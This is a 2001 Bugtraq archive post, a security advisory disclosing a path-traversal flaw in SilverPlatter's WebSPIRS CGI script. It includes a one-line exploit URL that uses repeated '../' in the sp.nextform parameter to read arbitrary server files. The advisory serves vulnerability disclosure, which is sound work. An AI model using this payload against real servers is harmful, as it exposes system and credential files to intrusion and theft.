Bugtraq mailing list archives

WebSPIRS CGI script "show files" Vulnerability.

From: UkR-XblP <cuctema () OK RU>
Date: Mon, 12 Feb 2001 17:15:48 +0300

-----------UkR security team advisory #1 ------------
WebSPIRS CGI script "show files" Vulnerability.
--------------------------------------------------


Name: WebSPIRS CGI script "show files" Vulnerability.
Date: 27.01.2001
About: WebSPIRS is SilverPlatter's Information Retrieval
System for the World Wide Web (WWW). It is a common gateway
interface (CGI) application which allows any forms-capable
browser, such as Netscape, to search SilverPlatter (SP)
Electronic Reference Library (ERL) databases available over
the Internet. http://www.silverplatter.com.
Problem: Problem lyes in incorrect validation of user
submitted-by-browser information, that can show any file of
the system where script installed.
Aothor: UkR-XblP
Exploit: www.target.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../path/to/file
Affected: affected in all version of this script

Get your free e-mail address at http://www.zmail.ru

Current thread:

WebSPIRS CGI script "show files" Vulnerability. UkR-XblP (Feb 12)
- Re: WebSPIRS CGI script "show files" Vulnerability. Ashwin Kutty (Feb 13)